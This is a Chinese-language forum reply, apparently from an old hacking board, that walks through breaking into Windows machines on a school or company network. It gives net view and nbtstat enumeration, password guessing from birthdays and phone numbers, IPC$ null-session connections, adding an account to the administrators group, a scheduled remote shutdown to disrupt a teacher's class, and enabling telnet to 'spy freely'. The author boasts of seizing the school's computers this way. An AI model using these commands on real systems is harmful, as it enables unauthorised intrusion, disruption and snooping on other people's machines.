telnet的问题，高手进……

我曾经也发过你这类似的问题. 在论坛和百度等地方.
没有一个是可以的.
内网的话 机号是很好搞到手的.
net view
查看此内网的一些用户!
现在你就得到 他的用户名了. 至于密码 如果是学校的话 估计就是 123456
或什么 teacher 或别的什么 反正不会太难. 如果是公司单位的话. 那就多注意他的一些敏感信息. 比如 手机号 生日 QQ号 家庭电话号码.
姓名的拼音!等等等等..
你知道他的 用户名后 用 ping 对方的机号
知道IP 地址.
下面 用到 IPC$
在你不知道 密码的情况下 先试
net use \\ip\ipc$ "" /user:"机号"
成功的话 就提权 映射磁盘
net localgroup administrators 用户名 /add
! 不成功 就空连接
net use \\ip\ipc$ "" /user:""
命令：net view \\IP
建立了空连接后，用此命令可以查看远程主机的共享资源，如果它开了共享，可以得到如下类似类似结果：
在 \\*.*.*.*的共享资源
资源共享名 类型 用途 注释

-----------------------------------------------------------
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
命令成功完成
然后针对别的共享下手!
还可以查看远程主机的当前时间
命令：net time \\IP
用此命令可以得到一个远程主机的当前时间。

4 得到远程主机的NetBIOS用户名列表（需要打开自己的NBT）
nbtstat -A IP
用此命令可以得到一个远程主机的NetBIOS用户名列表（需要你的netbios支持），返回如下结果：

Node IpAddress: [*.*.*.*] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
SERVER <00> UNIQUE Registered
OYAMANISHI-H <00> GROUP Registered
OYAMANISHI-H <1C> GROUP Registered
SERVER <20> UNIQUE Registered
OYAMANISHI-H <1B> UNIQUE Registered
OYAMANISHI-H <1E> GROUP Registered
SERVER <03> UNIQUE Registered
OYAMANISHI-H <1D> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered
INet~Services <1C> GROUP Registered
IS~SERVER......<00> UNIQUE Registered

MAC Address = 00-50-8B-9A-2D-37

以上就是我们经常使用空会话做的事情，好像也能获得不少东西哟，不过要注意一点：建立IPC$连接的操作会在EventLog中留下记录，不管你是否登录成功。
呵呵...
我们学校的电脑 就是这样给我一步一步的征服过来的.
碰到讨厌的老师讲课时...
at \\ip 15:04 shutdown -s -t 00

很简单,如果他的文件系统使用的是ntfs,和他建立ipc$连接,右击他的共享文件夹,选择安全选项卡,获得administrators权限,然后连接他本机的services.msc
打开telnet服务,win2K以上系统这个服务默认是关闭的
然后远程管理他的本地用户和组,新建一个administrators组的用户
最后,就开始尽情的偷窥吧...
telnet a.b.c.d
login:XXX
password:******
哈...